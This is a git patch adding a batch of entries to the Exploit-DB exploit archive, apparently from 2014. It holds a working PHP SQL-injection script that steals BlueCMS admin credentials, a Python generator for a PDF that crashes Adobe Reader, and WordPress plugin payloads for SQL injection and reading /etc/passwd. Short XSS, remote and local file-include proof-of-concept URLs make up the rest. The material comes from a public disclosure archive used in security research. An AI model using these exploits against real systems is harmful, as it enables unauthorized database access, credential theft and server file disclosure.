From ad75a1324dd6f8d53a833f79ab65fc8a74c6d237 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 12 Sep 2014 04:45:04 +0000
Subject: [PATCH] Updated 09_12_2014

---
 files.csv                       |  10 +++
 platforms/php/webapps/34589.txt |  52 ++++++++++++++++
 platforms/php/webapps/34604.php |  90 +++++++++++++++++++++++++++
 platforms/php/webapps/34605.txt |  11 ++++
 platforms/php/webapps/34606.txt |   9 +++
 platforms/php/webapps/34607.txt |   9 +++
 platforms/php/webapps/34608.txt |   9 +++
 platforms/php/webapps/34609.txt |   9 +++
 platforms/php/webapps/34610.txt |   9 +++
 platforms/php/webapps/34611.txt |   9 +++
 platforms/windows/dos/34603.py  | 106 ++++++++++++++++++++++++++++++++
 11 files changed, 323 insertions(+)
 create mode 100755 platforms/php/webapps/34589.txt
 create mode 100755 platforms/php/webapps/34604.php
 create mode 100755 platforms/php/webapps/34605.txt
 create mode 100755 platforms/php/webapps/34606.txt
 create mode 100755 platforms/php/webapps/34607.txt
 create mode 100755 platforms/php/webapps/34608.txt
 create mode 100755 platforms/php/webapps/34609.txt
 create mode 100755 platforms/php/webapps/34610.txt
 create mode 100755 platforms/php/webapps/34611.txt
 create mode 100755 platforms/windows/dos/34603.py

diff --git a/files.csv b/files.csv
index 0a50179b9..bd5f0ad0d 100755
--- a/files.csv
+++ b/files.csv
@@ -31147,6 +31147,7 @@ id,file,description,date,author,platform,type,port
 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
+34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
@@ -31157,3 +31158,12 @@ id,file,description,date,author,platform,type,port
 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
+34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 'acroform_PlugInMain' Memory Corruption Vulnerability",2010-09-06,ITSecTeam,windows,dos,0
+34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 'X-Forwarded-For' Header SQL Injection Vulnerability",2010-09-06,cnryan,php,webapps,0
+34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
+34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager `index.php' Cross Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
+34607,platforms/php/webapps/34607.txt,"TBDev 2.0 Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
+34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
+34609,platforms/php/webapps/34609.txt,"MySource Matrix 'char_map.php' Multiple Cross Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
+34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
+34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
diff --git a/platforms/php/webapps/34589.txt b/platforms/php/webapps/34589.txt
new file mode 100755
index 000000000..5480f1908
--- /dev/null
+++ b/platforms/php/webapps/34589.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Wordpress WP Support Plus Responsive Ticket System 2.0
+Plugin - Multiple Vulnerabilities
+# Google Dork: N/A
+# Date: 09.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - http://wpsuportplus.byethost7.com/
+# Software
+http://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
+# Version: 2.0
+# Tested on: PHP
+
+
+Description:
+This plugin adds to WordPress the features of a complete ticket system with
+100% responsive and 100% Ajax functionality. This allows users to submit
+tickets to report problems or get support on whatever you want. Users can
+set the status, priority and category of each ticket.
+
+
+Proof of Concept:
+
+1. SQL INJECTION
+URL     : http://localhost/wp-admin/admin-ajax.php
+METHOD  : POST
+REQUEST : action=openTicket&ticket_id=-1 UNION SELECT
+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7
+* any registered user can successfully execute this request
+
+
+2. FULL PATH DISCLOSURE
+a) URL :
+http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/var/www/wp-content/uploads/2014/09/file.pdf
+ * full path to the file will be shown to the user after the file has been
+uploaded
+b) URL :
+http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=
+ * full path will be shown in PHP error message if parameter "path" is empty
+
+
+3. DIRECTORY TRAVERSAL
+URL :
+http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/etc/passwd
+* any file from the server can be downloaded by giving parameter "path" the
+location to the file
+
+
+4. BROKEN AUTHENTICATION
+URL :
+http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=<any
+file path>
+* The script "downloadAttachment.php" is accessible for anyone without
+having to login.
diff --git a/platforms/php/webapps/34604.php b/platforms/php/webapps/34604.php
new file mode 100755
index 000000000..1d0444f8e
--- /dev/null
+++ b/platforms/php/webapps/34604.php
@@ -0,0 +1,90 @@
+source: http://www.securityfocus.com/bid/42999/info
+
+BlueCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+<?php
+print_r('
++---------------------------------------------------------------------------+
+BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
+by cnryan
+Mail: cnryan2008[at]gmail[dot]com
+Blog: http://hi.baidu.com/cnryan     
+
+            W . S . T                        
++---------------------------------------------------------------------------+
+');
+if ($argc < 3) {
+    print_r('
++---------------------------------------------------------------------------+
+Example:
+php '.$argv[0].' localhost /bluecms/
++---------------------------------------------------------------------------+
+');
+    exit;
+}
+error_reporting(7);
+ini_set('max_execution_time', 0);
+$host = $argv[1];
+$path = $argv[2];
+send();
+send2();
+function send()
+{
+    global $host, $path;
+    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";
+    $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";
+    $data = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";
+    $data .= "Accept: */*\r\n";
+    $data .= "Accept-Language: zh-cn\r\n";
+    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
+    $data .= "Host: $host\r\n";
+    $data .= "Content-Length: ".strlen($cmd)."\r\n";
+    $data .= "Connection: Close\r\n";
+    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
+    $data .= $cmd;
+
+    $fp = fsockopen($host, 80);
+    fputs($fp, $data);
+
+    $resp = '';
+
+    while ($fp && !feof($fp))
+        $resp .= fread($fp, 1024);
+
+    return $resp;
+}
+
+function send2()
+{
+global $host, $path;
+$message="GET ".$path."news.php?id=1 HTTP/1.1\r\n";
+$message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";
+$message.="Accept-Language: zh-cn\r\n";
+$message.="Accept-Encoding: gzip, deflate\r\n";
+$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";
+$message.="Host: $host\r\n";
+$message.="Connection: Keep-Alive\r\n\r\n";
+$fd = fsockopen($host,'80');
+if(!$fd)
+{
+    echo '[-]No response from'.$host;
+    die;
+}
+fputs($fd,$message);
+$resp = '';
+while (!feof($fd)) {
+    $resp.=fgets($fd);
+}
+fclose($fd);
+preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db);
+if($db[1][0]&$db[2][0])
+{
+echo "username->".$db[1][0]."\r\n";
+echo "password->".$db[2][0]."\r\n";
+echo "[+]congratulation ^ ^";
+}else die('[-]exploited fail >"<');
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/34605.txt b/platforms/php/webapps/34605.txt
new file mode 100755
index 000000000..98cca8a3a
--- /dev/null
+++ b/platforms/php/webapps/34605.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43001/info
+
+Horde Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to and including Horde 3.3.8.
+
+Note that additional products that use the Horde framework may also be vulnerable. 
+
+http://www.example.com/util/icon_browser.php?subdir=[xss]&app=horde 
\ No newline at end of file
diff --git a/platforms/php/webapps/34606.txt b/platforms/php/webapps/34606.txt
new file mode 100755
index 000000000..8664bd1e2
--- /dev/null
+++ b/platforms/php/webapps/34606.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43003/info
+
+Webformatique Reservation Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Webformatique Reservation Manager 2.4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?resman_startdate=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34607.txt b/platforms/php/webapps/34607.txt
new file mode 100755
index 000000000..43f5c5d30
--- /dev/null
+++ b/platforms/php/webapps/34607.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43004/info
+
+TBDev is prone to multiple input-validation vulnerabilities, including a remote file-include issue and an SQL-injection issue.
+
+A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+TBDev 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admincp.php?rootpath=(rfi) 
\ No newline at end of file
diff --git a/platforms/php/webapps/34608.txt b/platforms/php/webapps/34608.txt
new file mode 100755
index 000000000..b4d0ce241
--- /dev/null
+++ b/platforms/php/webapps/34608.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43006/info
+
+HeffnerCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+HeffnerCMS 1.22 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?page=lang/interface_en.lng%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/34609.txt b/platforms/php/webapps/34609.txt
new file mode 100755
index 000000000..23b43e006
--- /dev/null
+++ b/platforms/php/webapps/34609.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43020/info
+
+MySource Matrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects MySource Matrix 3.28.3; other versions may also be affected.
+
+http://www.example.com/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/34610.txt b/platforms/php/webapps/34610.txt
new file mode 100755
index 000000000..7c4f767d6
--- /dev/null
+++ b/platforms/php/webapps/34610.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43021/info
+
+Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zenphoto 1.3 is vulnerable; other versions may also be affected.
+
+/zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75
\ No newline at end of file
diff --git a/platforms/php/webapps/34611.txt b/platforms/php/webapps/34611.txt
new file mode 100755
index 000000000..ef7142ed0
--- /dev/null
+++ b/platforms/php/webapps/34611.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43021/info
+ 
+Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Zenphoto 1.3 is vulnerable; other versions may also be affected.
+
+/zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22
\ No newline at end of file
diff --git a/platforms/windows/dos/34603.py b/platforms/windows/dos/34603.py
new file mode 100755
index 000000000..23667caba
--- /dev/null
+++ b/platforms/windows/dos/34603.py
@@ -0,0 +1,106 @@
+source: http://www.securityfocus.com/bid/42998/info
+
+Adobe Acrobat and Reader are prone to a remote memory-corruption vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions. 
+
+#!user/bin/python
+
+_doc_ = '''
+-------------------------------------------------------------------------
+title : adobe acrobat reader acroform_PlugInMain memory corruption
+Product: Adobe Acrobat Reader
+Version: 7.x, 8.x, 9.x
+Tested : 8.1 - 9.1 - 9.2 - 9.3.3 - 9.3.4
+Product Homepage: www.adobe.com
+Tested Os : Windows XP SP1/SP3 EN 
+            Windows Seven
+AUTHOR  : ITSecTeam
+Email   : Bug@ITSecTeam.com
+Website : http://www.itsecteam.com
+Forum   : http://forum.ITSecTeam.com
+--------------------------------------------------------------------------
+'''
+import sys
+
+
+def main():
+	buffer = "%PDF-1.7"
+	buffer += "\n1 0 obj\n"
+	buffer += "<<\n"
+	buffer += "/Kids [2 0 R]\n"
+	buffer += "/Count 1\n"
+	buffer += "/Type /Pages\n"
+	buffer += ">>\n"
+	buffer += "endobj\n"
+	buffer += "2 0 obj\n"
+	buffer += "<<\n"
+	buffer += "/Group\n"
+	buffer += "<<\n"
+	buffer += ">>\n"
+	buffer += "/Parent 1 0 R\n"
+	buffer += "/Annots [3 0 R ]\n"
+	buffer += ">>\n"
+	buffer += "endobj\n"
+	buffer += "3 0 obj\n"
+	buffer += "<<\n"
+	buffer += "/Subtype /Widget\n"
+	buffer += "/Rect []\n"
+	buffer += "/FT /Btn\n"
+	buffer += ">>\n"
+	buffer += "endobj\n"
+	buffer += "4 0 obj\n"
+	buffer += "<<\n"
+	buffer += "/Names\n"
+	buffer += "<<\n"
+	buffer += ">>\n"
+	buffer += "/Pages 1 0 R\n"
+	buffer += "/OCProperties\n"
+	buffer += "<<\n"
+	buffer += "/D\n"
+	buffer += "<<\n"
+	buffer += ">>\n"
+	buffer += ">>\n"
+	buffer += "/AcroForm\n" 
+	buffer += "<<\n"
+	buffer += "/NeedAppearances true\n"
+	buffer += "/DR\n"
+	buffer += "<<\n"
+	buffer += "/Font\n" 
+	buffer += "<<\n"
+	buffer += ">>\n"
+	buffer += ">>\n"
+	buffer += ">>\n"
+	buffer += "/ViewerPreferences\n"
+	buffer += "<<\n"
+	buffer += ">>\n"
+	buffer += ">>\n"
+	buffer += "endobj xref\n"
+	buffer += "0000000000 65535 f\n" 
+	buffer += "0000000015 00000 n\n"
+	buffer += "0000000074 00000 n\n"
+	buffer += "0000000199 00000 n\n"
+	buffer += "0000000280 00000 n\n"
+	buffer += "trailer\n"
+	buffer += "<<\n"
+	buffer += "/Root 4 0 R\n"
+	buffer += "/Size 5\n"
+	buffer += ">>\n"
+	buffer += "startxref\n"
+	buffer += "449\n"
+	buffer += "%%EOF\n"
+		
+	
+	try:
+		print "[+] Creating POC file.."
+		exploit = open('crash.pdf','w');
+		exploit.write(buffer);
+		exploit.close();
+		print "[+] POC file created!"
+	except:
+		print "[-] Error: try again"
+		sys.exit(0)
+	
+if __name__=="__main__":
+	print _doc_
+	main()